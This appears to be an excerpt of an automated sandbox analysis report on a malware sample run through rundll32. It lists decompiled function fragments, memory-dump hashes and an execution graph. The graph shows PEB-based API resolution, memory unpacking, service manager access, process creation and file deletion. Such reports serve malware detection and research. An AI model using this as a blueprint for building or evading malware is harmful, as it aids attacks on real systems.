                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1bd66c3414af41d30ad53092081a3d7845d29b2687e5c3fdf6ea99daaf4f402b
                                                                      • Instruction ID: b073413da367bf2f565b142e64436ef33f591f5211819603bd9388f9ef9d3ad5
                                                                      • Opcode Fuzzy Hash: 1bd66c3414af41d30ad53092081a3d7845d29b2687e5c3fdf6ea99daaf4f402b
                                                                      • Instruction Fuzzy Hash: A221BF75D0020EEFDB59EFE5C58A5AEFBB0BB10708F208588D42172250D3B90B59DF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00241372, Relevance: .0, Instructions: 47COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1bd66c3414af41d30ad53092081a3d7845d29b2687e5c3fdf6ea99daaf4f402b
                                                                      • Instruction ID: 8d41692e737415f54955d6e6d4b71f8d37923ef56a5ac4c98ebb9ddfd342a745
                                                                      • Opcode Fuzzy Hash: 1bd66c3414af41d30ad53092081a3d7845d29b2687e5c3fdf6ea99daaf4f402b
                                                                      • Instruction Fuzzy Hash: 3121BF75D0020EEFDB59EFE4C54A5AEFBB0BB50708F208588D42172251D3B90B59DF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02004F04, Relevance: .0, Instructions: 45COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E02004F04(void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _t53;

				_v24 = _v24 & 0x00000000;
				_v36 = 0x77d1f3;
				_v32 = 0x102c4a;
				_v28 = 0x31c61e;
				_v12 = 0xccec;
				_v12 = _v12 >> 5;
				_v12 = _v12 >> 0xb;
				_v12 = _v12 | 0xecb7e12e;
				_v12 = _v12 ^ 0xecb7f166;
				_v8 = 0x1581;
				_v8 = _v8 | 0xff7deff7;
				_v8 = _v8 ^ 0xd17bf610;
				_v8 = _v8 ^ 0x2e060f97;
				_v16 = 0x4eb3;
				_v16 = _v16 + 0xfffffcad;
				_v16 = _v16 ^ 0xeadf5fa4;
				_v16 = _v16 ^ 0xeadf108b;
				_v20 = 0x2120;
				_v20 = _v20 ^ 0xb07dd198;
				_t53 = 0x4f;
				_v20 = _v20 / _t53;
				_v20 = _v20 ^ 0x023bed5f;
				return 0 | E0200C631(_v12, _a4,  *((intOrPtr*)( *0x2011090 + 0x1c)), _v8, _v16) != _v20;
			}












                                                                      0x02004f0a
                                                                      0x02004f10
                                                                      0x02004f17
                                                                      0x02004f1e
                                                                      0x02004f25
                                                                      0x02004f2c
                                                                      0x02004f30
                                                                      0x02004f34
                                                                      0x02004f3b
                                                                      0x02004f42
                                                                      0x02004f49
                                                                      0x02004f50
                                                                      0x02004f57
                                                                      0x02004f5e
                                                                      0x02004f65
                                                                      0x02004f6c
                                                                      0x02004f73
                                                                      0x02004f7a
                                                                      0x02004f81
                                                                      0x02004f8d
                                                                      0x02004f93
                                                                      0x02004f96
                                                                      0x02004fc5

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a0fb8a8522457bc5384e3136a581cc6e301dbdf506e00733bfdf3af101fa210d
                                                                      • Instruction ID: 690ef169876cc7a228a00f208b1ebc1934f05d310eb5ef2808495b1c1af13f17
                                                                      • Opcode Fuzzy Hash: a0fb8a8522457bc5384e3136a581cc6e301dbdf506e00733bfdf3af101fa210d
                                                                      • Instruction Fuzzy Hash: C311E274D4020DEBDB09CFA5D98A5EEFBB1FF44314F108699D925AA2A0C7B80B55DF80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00244478, Relevance: .0, Instructions: 45COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7ff94fc5db09bf2cffc6a641dbfc9c41617e5a91856c6a501d2d6f82b6806102
                                                                      • Instruction ID: c44e8b4ca43a07e28761fc30f8451f14f96fc8e88a8b2077feb97cd04a9f49e1
                                                                      • Opcode Fuzzy Hash: 7ff94fc5db09bf2cffc6a641dbfc9c41617e5a91856c6a501d2d6f82b6806102
                                                                      • Instruction Fuzzy Hash: FA111474D0020DEBDB08CFA4C98A5EEBBB1FF44304F108588D525A6260C7B80B55CF40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01FF3278, Relevance: .0, Instructions: 2COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E01FF3278() {

				return  *[fs:0x30];
			}



                                                                      0x01ff327e

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                      • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                      • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                      • Instruction Fuzzy Hash:
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 002327EC, Relevance: .0, Instructions: 2COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                      • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                      • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                      • Instruction Fuzzy Hash:
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02018330, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetMonitorInfoA.USER32(?,?), ref: 02018361
                                                                      • GetSystemMetrics.USER32(00000000), ref: 0201839D
                                                                      • GetSystemMetrics.USER32(00000001), ref: 020183A8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088761508.0000000002013000.00000020.00020000.sdmp, Offset: 02013000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_2013000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem$InfoMonitor
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfo
                                                                      • API String ID: 4250584380-1428758730
                                                                      • Opcode ID: 04ecff48eb234fbf3e31fa29dd6e888e1bdf158b5b699fe09ba5ccffcadb1a70
                                                                      • Instruction ID: 2fb8abeafbd25850d1847d23ab74e2b26dd189ce7a5ab291e14a27953b2249ff
                                                                      • Opcode Fuzzy Hash: 04ecff48eb234fbf3e31fa29dd6e888e1bdf158b5b699fe09ba5ccffcadb1a70
                                                                      • Instruction Fuzzy Hash: 7B110371A413159FE320CF609C847BBB7EDFB05720F448A29ED46D7240D7B1A600DBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 020185AC, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • EnumDisplayMonitors.USER32(?,?,?,?), ref: 020185E5
                                                                      • GetSystemMetrics.USER32(00000000), ref: 0201860A
                                                                      • GetSystemMetrics.USER32(00000001), ref: 02018615
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088761508.0000000002013000.00000020.00020000.sdmp, Offset: 02013000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_2013000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem$DisplayEnumMonitors
                                                                      • String ID: /}Au$EnumDisplayMonitors
                                                                      • API String ID: 1389147845-1105134141
                                                                      • Opcode ID: e916b40d8c21c532d867f37bf6451a2c264770f2f704c1860e8ef2cb609d3ca1
                                                                      • Instruction ID: 05f922c5d4f62aca0f968dade12ba72a9507ded5927094e839d6e41cdf198bef
                                                                      • Opcode Fuzzy Hash: e916b40d8c21c532d867f37bf6451a2c264770f2f704c1860e8ef2cb609d3ca1
                                                                      • Instruction Fuzzy Hash: 4931FEB2E0131AAFEB51DEA4CC84AEF77FCAF55215F008526E915E3200EB75D610DBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02018404, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 02018471
                                                                      • GetSystemMetrics.USER32(00000001), ref: 0201847C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088761508.0000000002013000.00000020.00020000.sdmp, Offset: 02013000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_2013000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfoA
                                                                      • API String ID: 4116985748-2822609925
                                                                      • Opcode ID: 0e6a36dae21ebd5b78141f6f29f64b2e7d677f04e87f62cef80a44966c84fe99
                                                                      • Instruction ID: 24fd07a7333b2c82ede915911725371fce972d7bb34ee27942c3877f1b224a10
                                                                      • Opcode Fuzzy Hash: 0e6a36dae21ebd5b78141f6f29f64b2e7d677f04e87f62cef80a44966c84fe99
                                                                      • Instruction Fuzzy Hash: 50112231A813149FE764CF60DC45BA7B7ECFF05320F408A29ED96CB240DBB5A6409BA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 020184D8, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 02018545
                                                                      • GetSystemMetrics.USER32(00000001), ref: 02018550
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088761508.0000000002013000.00000020.00020000.sdmp, Offset: 02013000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_2013000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfoW
                                                                      • API String ID: 4116985748-1558784340
                                                                      • Opcode ID: 90fb42a799789d4e605f19eb3a8c94f5edc55d0a826e5fae146b24aeafd7127f
                                                                      • Instruction ID: f247034f5e4ab2d0d864addda6121c4c8ba2b1696375e6337edc1af0eab8f8ba
                                                                      • Opcode Fuzzy Hash: 90fb42a799789d4e605f19eb3a8c94f5edc55d0a826e5fae146b24aeafd7127f
                                                                      • Instruction Fuzzy Hash: 2B110331A417159FE760CF618C44BA7B7EEFB06320F448A2AED05C7240D7B6A600DBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02018298, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 020182E6
                                                                      • GetSystemMetrics.USER32(00000001), ref: 020182F8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088761508.0000000002013000.00000020.00020000.sdmp, Offset: 02013000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_2013000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$MonitorFromPoint
                                                                      • API String ID: 4116985748-3670600901
                                                                      • Opcode ID: 6c320bab9f6e81baed2246e1f28b80d5be402eccd029ab11bf750f45d27bfd9f
                                                                      • Instruction ID: 46021d9a412e1b69fcc11bb575feb0f06823cabc93ec4585b1f52fbab1bccd3e
                                                                      • Opcode Fuzzy Hash: 6c320bab9f6e81baed2246e1f28b80d5be402eccd029ab11bf750f45d27bfd9f
                                                                      • Instruction Fuzzy Hash: 0C01D631641318AFEB044F50DC88B9FBB9AFB40764F88C525F9048B201C376AE109BA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02018170, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 020181C1
                                                                      • GetSystemMetrics.USER32(00000001), ref: 020181CD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088761508.0000000002013000.00000020.00020000.sdmp, Offset: 02013000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_2013000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$MonitorFromRect
                                                                      • API String ID: 4116985748-120404372
                                                                      • Opcode ID: 151f25671ac3f8445047f1c8c0d61fcbbdfb98a544d584c3852e689f90e53a5d
                                                                      • Instruction ID: d573f4eac87fd3fb5cbe5fdf2bcfe0a121122287d1c26aa6b3925ce7953e5bbb
                                                                      • Opcode Fuzzy Hash: 151f25671ac3f8445047f1c8c0d61fcbbdfb98a544d584c3852e689f90e53a5d
                                                                      • Instruction Fuzzy Hash: 63016D32A403259BE7509B94D888B67F7DDE741391F84C666ED04CB602C37ADA50DFA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02052B38, Relevance: 6.1, APIs: 4, Instructions: 61COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DdeCreateStringHandleA.USER32(00000015,00000000), ref: 02052B7C
                                                                      • DdeClientTransaction.USER32(00000000,000000FF,00000000,?,?,00001034,000003E8,?), ref: 02052BA9
                                                                      • DdeGetLastError.USER32(00000015), ref: 02052BBB
                                                                      • DdeFreeStringHandle.USER32(00000015,?), ref: 02052BCD
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088761508.0000000002013000.00000020.00020000.sdmp, Offset: 02013000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_2013000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: HandleString$ClientCreateErrorFreeLastTransaction
                                                                      • String ID:
                                                                      • API String ID: 2421758087-0
                                                                      • Opcode ID: b2e866fae9f7591522e190fda75dc508a64ecbafadabbebc3c281e0f772b4a61
                                                                      • Instruction ID: 538b4ad91935a288d588a3d2b5f6bf92c4be5d1c118b051f32b8b668f4ba3d7f
                                                                      • Opcode Fuzzy Hash: b2e866fae9f7591522e190fda75dc508a64ecbafadabbebc3c281e0f772b4a61
                                                                      • Instruction Fuzzy Hash: DD2136746043409FEB40DF68C8C0EAAB7F8AF48310F158195ED48CF2A6D775E840DB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 020180E8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemMetrics.USER32(?), ref: 02018110
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088761508.0000000002013000.00000020.00020000.sdmp, Offset: 02013000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_2013000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$GetSystemMetrics
                                                                      • API String ID: 4116985748-3773086709
                                                                      • Opcode ID: db5bed2123515fa725822b2ce38b648c03f33263d43d815afe05241513074211
                                                                      • Instruction ID: 0e46f3b322d392e8872acbd612a963bb40dc656fab4e4a6aff8f4a0cea7db47a
                                                                      • Opcode Fuzzy Hash: db5bed2123515fa725822b2ce38b648c03f33263d43d815afe05241513074211
                                                                      • Instruction Fuzzy Hash: C9F024339403014AF7804A34CDC4737758EB742334F80CF21E6258A6C1C33E8B00E644
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Analysis Process: rundll32.exe PID: 2692 Parent PID: 2688 rundll32.exeCOMMON

                                                                      Execution Graph

                                                                      Execution Coverage:4.3%
                                                                      Dynamic/Decrypted Code Coverage:4.2%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:262
                                                                      Total number of Limit Nodes:13

                                                                      Graph

                                                                      execution_graph 31186 1ff99ef 31187 1ff9ab9 31186->31187 31188 1ff9a92 31186->31188 31192 200a0f1 31188->31192 31204 200a681 31192->31204 31197 200a883 31212 1ff6417 31197->31212 31199 1ff5dfc GetPEB RtlAllocateHeap 31199->31204 31201 1ff9aa5 31201->31187 31205 20004c7 31201->31205 31202 2000d6d GetPEB 31202->31204 31204->31197 31204->31199 31204->31201 31204->31202 31208 1ff7f4b 31204->31208 31222 2000dc5 GetPEB 31204->31222 31223 1ff5755 31204->31223 31227 1ff471a 31204->31227 31231 1ffdfd8 GetPEB 31204->31231 31232 1ffa4d7 GetPEB 31204->31232 31206 1ff7378 GetPEB 31205->31206 31207 200055b ExitProcess 31206->31207 31207->31187 31209 1ff7f64 31208->31209 31233 1ff7378 31209->31233 31213 1ff6445 31212->31213 31214 1ff5755 GetPEB 31213->31214 31215 1ff668d 31214->31215 31241 200b86e 31215->31241 31217 1ff66c9 31218 1ff66d4 31217->31218 31245 1fff1ed 31217->31245 31218->31201 31220 1ff66f4 31221 1fff1ed 2 API calls 31220->31221 31221->31218 31222->31204 31224 1ff576d 31223->31224 31249 20009b8 31224->31249 31228 1ff4740 31227->31228 31229 1ff7378 GetPEB 31228->31229 31230 1ff47d8 SHGetFolderPathW 31229->31230 31230->31204 31231->31204 31232->31204 31234 1ff7490 lstrcmpiW 31233->31234 31235 1ff7464 31233->31235 31234->31204 31239 2000223 GetPEB 31235->31239 31237 1ff747a 31240 200c4dd GetPEB 31237->31240 31239->31237 31240->31234 31242 200b8aa 31241->31242 31243 1ff7378 GetPEB 31242->31243 31244 200b92d CreateProcessW 31243->31244 31244->31217 31246 1fff203 31245->31246 31247 1ff7378 GetPEB 31246->31247 31248 1fff29f CloseHandle 31247->31248 31248->31220 31250 20009d1 31249->31250 31253 200e232 31250->31253 31254 200e24d 31253->31254 31255 1ff7378 GetPEB 31254->31255 31256 1ff57cc 31255->31256 31256->31204 31257 1ff43df 31262 2005250 31257->31262 31259 1ff4457 31260 20004c7 2 API calls 31259->31260 31261 1ff4467 31260->31261 31297 20061a4 31262->31297 31264 200696d 31388 1ffc364 6 API calls 31264->31388 31267 2006991 31389 200d02d GetPEB SHGetFolderPathW RtlAllocateHeap CloseHandle CreateProcessW 31267->31389 31269 200696b 31269->31259 31273 1ffde81 GetPEB 31273->31297 31295 1ffdf8a GetPEB 31295->31297 31297->31264 31297->31267 31297->31269 31297->31273 31297->31295 31298 1ffea16 31297->31298 31302 1ff1806 31297->31302 31316 1ffa821 31297->31316 31325 1ff4d90 31297->31325 31336 1ff5f04 31297->31336 31344 1ffd2dd 31297->31344 31354 1ff4844 31297->31354 31365 2004f04 GetPEB 31297->31365 31366 1ff3faf GetPEB 31297->31366 31367 2000e6b GetPEB RtlAllocateHeap 31297->31367 31368 1ffa2d2 GetPEB RtlAllocateHeap 31297->31368 31369 1ffe612 GetPEB 31297->31369 31370 2001dfe GetPEB 31297->31370 31371 2004c37 GetPEB RtlAllocateHeap 31297->31371 31372 1ff37a2 GetPEB 31297->31372 31373 200a966 GetPEB RtlAllocateHeap 31297->31373 31374 2004a9e GetPEB RtlAllocateHeap 31297->31374 31375 2000d6d 31297->31375 31379 1ff9106 GetPEB RtlAllocateHeap 31297->31379 31380 200c6d9 GetPEB RtlAllocateHeap CloseHandle 31297->31380 31381 200434e GetPEB CloseServiceHandle OpenServiceW OpenSCManagerW 31297->31381 31382 1ff7ffe GetPEB RtlAllocateHeap 31297->31382 31383 2000ec3 GetPEB RtlAllocateHeap 31297->31383 31384 1ffe044 GetPEB RtlAllocateHeap 31297->31384 31385 2002fa1 6 API calls 31297->31385 31386 1ff434a GetPEB 31297->31386 31387 2009dbf GetPEB CloseHandle 31297->31387 31300 1ffea30 31298->31300 31299 1ffeb08 31299->31297 31300->31299 31301 2000b8a GetPEB RtlAllocateHeap LoadLibraryW 31300->31301 31301->31300 31313 1ff1f54 31302->31313 31303 1ff471a 2 API calls 31303->31313 31304 1ff2125 31309 1ff5ab8 2 API calls 31304->31309 31307 1ff2141 31307->31297 31309->31307 31313->31303 31313->31304 31313->31307 31315 2000d6d GetPEB 31313->31315 31390 1ffcaa3 31313->31390 31403 200340e 31313->31403 31407 1ff5dfc 31313->31407 31411 200d4e1 GetPEB 31313->31411 31412 1ff98c5 GetPEB 31313->31412 31413 1ff5ab8 31313->31413 31417 1ff7626 GetPEB 31313->31417 31315->31313 31320 1ffab09 31316->31320 31318 1ff54fb 2 API calls 31318->31320 31320->31318 31321 200340e 2 API calls 31320->31321 31322 1ffacd9 31320->31322 31323 1ff5ab8 2 API calls 31320->31323 31324 1ff471a 2 API calls 31320->31324 31448 2001f88 GetPEB 31320->31448 31449 1ffdfd8 GetPEB 31320->31449 31321->31320 31322->31297 31323->31320 31324->31320 31332 1ff51f7 31325->31332 31327 1ff53f0 31327->31297 31328 1ff5dfc 2 API calls 31328->31332 31330 1ff53f2 31333 1fff1ed 2 API calls 31330->31333 31332->31327 31332->31328 31332->31330 31334 2000d6d GetPEB 31332->31334 31450 20041ca 31332->31450 31454 200c0c8 31332->31454 31458 1ffa4d7 GetPEB 31332->31458 31459 2004291 GetPEB 31332->31459 31333->31327 31334->31332 31339 1ff6203 31336->31339 31341 1ff6367 31339->31341 31342 1fff1ed 2 API calls 31339->31342 31343 200c0c8 2 API calls 31339->31343 31460 2007a31 31339->31460 31464 2004291 GetPEB 31339->31464 31465 1ffdfd8 GetPEB 31339->31465 31341->31297 31342->31339 31343->31339 31346 1ffd5ba 31344->31346 31347 1ffd6c5 31346->31347 31349 1ffd6c7 31346->31349 31351 1ff5dfc 2 API calls 31346->31351 31353 2000d6d GetPEB 31346->31353 31466 200cbe7 31346->31466 31490 1ffa4d7 GetPEB 31346->31490 31491 1ffdfd8 GetPEB 31346->31491 31347->31297 31480 20047b5 31349->31480 31351->31346 31353->31346 31511 2001999 31354->31511 31356 1ff4d5f 31358 200cbe7 2 API calls 31356->31358 31357 1ff4d5d 31357->31297 31358->31357 31359 1ff5dfc GetPEB RtlAllocateHeap 31363 1ff4c22 31359->31363 31363->31356 31363->31357 31363->31359 31364 2000d6d GetPEB 31363->31364 31514 1ffa4d7 GetPEB 31363->31514 31515 1ffa156 GetPEB 31363->31515 31516 200baec GetPEB 31363->31516 31364->31363 31365->31297 31366->31297 31367->31297 31368->31297 31369->31297 31370->31297 31371->31297 31372->31297 31373->31297 31374->31297 31376 2000d7f 31375->31376 31377 1ffde81 GetPEB 31376->31377 31378 2000dbe 31377->31378 31378->31297 31379->31297 31380->31297 31381->31297 31382->31297 31383->31297 31384->31297 31385->31297 31386->31297 31387->31297 31388->31269 31389->31269 31399 1ffcad2 31390->31399 31392 1ffd189 31397 1ffde81 GetPEB 31392->31397 31393 1ffd19b 31393->31313 31397->31393 31399->31392 31399->31393 31400 1ff54fb GetPEB RtlAllocateHeap 31399->31400 31401 1ff5ab8 2 API calls 31399->31401 31418 2000321 31399->31418 31422 1ffde81 31399->31422 31428 20007a6 GetPEB 31399->31428 31429 1ffe48f GetPEB 31399->31429 31430 1ffebc8 GetPEB 31399->31430 31431 1ffa156 GetPEB 31399->31431 31400->31399 31401->31399 31404 2003423 31403->31404 31405 1ff7378 GetPEB 31404->31405 31406 20034cb OpenSCManagerW 31405->31406 31406->31313 31408 1ff5e17 31407->31408 31439 1ff54fb 31408->31439 31410 1ff5e89 31410->31313 31410->31410 31411->31313 31412->31313 31414 1ff5ace 31413->31414 31415 1ff7378 GetPEB 31414->31415 31416 1ff5b71 CloseServiceHandle 31415->31416 31416->31313 31417->31313 31419 200033d 31418->31419 31420 1ff7378 GetPEB 31419->31420 31421 20003e1 OpenServiceW 31420->31421 31421->31399 31423 1ffde94 31422->31423 31432 1ff7aa1 31423->31432 31428->31399 31429->31399 31430->31399 31431->31399 31433 1ff7378 GetPEB 31432->31433 31434 1ff7b30 31433->31434 31435 1ff3a9d 31434->31435 31436 1ff3ab8 31435->31436 31437 1ff7378 GetPEB 31436->31437 31438 1ff3b4c 31437->31438 31438->31399 31440 1ff7aa1 GetPEB 31439->31440 31441 1ff559d 31440->31441 31444 1ff9b5e 31441->31444 31443 1ff55ae 31443->31410 31445 1ff9b78 31444->31445 31446 1ff7378 GetPEB 31445->31446 31447 1ff9c2e RtlAllocateHeap 31446->31447 31447->31443 31448->31320 31449->31320 31451 20041ea 31450->31451 31452 1ff7378 GetPEB 31451->31452 31453 200427f SetFileInformationByHandle 31452->31453 31453->31332 31455 200c0f8 31454->31455 31456 1ff7378 GetPEB 31455->31456 31457 200c179 CreateFileW 31456->31457 31457->31332 31458->31332 31459->31332 31461 2007a51 31460->31461 31462 1ff7378 GetPEB 31461->31462 31463 2007adf 31462->31463 31463->31339 31464->31339 31465->31339 31467 200cc04 31466->31467 31468 1ff5755 GetPEB 31467->31468 31469 200ce8d 31468->31469 31470 1ff5755 GetPEB 31469->31470 31471 200cea7 31470->31471 31472 1ff5755 GetPEB 31471->31472 31473 200cebc 31472->31473 31492 20003f1 31473->31492 31476 20003f1 GetPEB 31477 200cef3 31476->31477 31496 1ffe554 31477->31496 31479 200cf23 31479->31346 31481 20047d2 31480->31481 31482 1ff5dfc 2 API calls 31481->31482 31483 2004981 31482->31483 31500 1ffecbd 31483->31500 31486 2000d6d GetPEB 31487 20049b1 31486->31487 31504 1ffeb1e 31487->31504 31489 20049c6 31489->31347 31490->31346 31491->31346 31493 200040a 31492->31493 31494 1ff7378 GetPEB 31493->31494 31495 20004b8 31494->31495 31495->31476 31497 1ffe567 31496->31497 31498 1ff7378 GetPEB 31497->31498 31499 1ffe607 SHFileOperationW 31498->31499 31499->31479 31501 1ffecdc 31500->31501 31508 2004150 31501->31508 31505 1ffeb31 31504->31505 31506 1ff7378 GetPEB 31505->31506 31507 1ffebbc DeleteFileW 31506->31507 31507->31489 31509 1ff7378 GetPEB 31508->31509 31510 1ffecf6 31509->31510 31510->31486 31512 1ff7378 GetPEB 31511->31512 31513 2001a3f 31512->31513 31513->31363 31514->31363 31515->31363 31516->31363 31517 1df090 31518 1df0b5 31517->31518 31523 1de620 31518->31523 31520 1df1bf 31526 1deb40 VirtualProtect 31520->31526 31522 1df1f8 31524 1de661 31523->31524 31525 1de694 VirtualAlloc 31524->31525 31525->31520 31528 1deb95 31526->31528 31527 1dede6 31527->31522 31528->31527 31529 1dedb8 VirtualProtect 31528->31529 31529->31528 31530 2053928 31531 2053972 31530->31531 31532 20539bd GetEnhMetaFileA 31531->31532 31533 20539cc VirtualAlloc 31532->31533 31535 2053acf 31533->31535 31536 2051638 31537 2051643 DdeInitializeA 31536->31537 31539 2051695 31537->31539 31542 2051a14 31539->31542 31547 2051ac8 31542->31547 31546 20516d6 31548 2051ad2 31547->31548 31549 2051a34 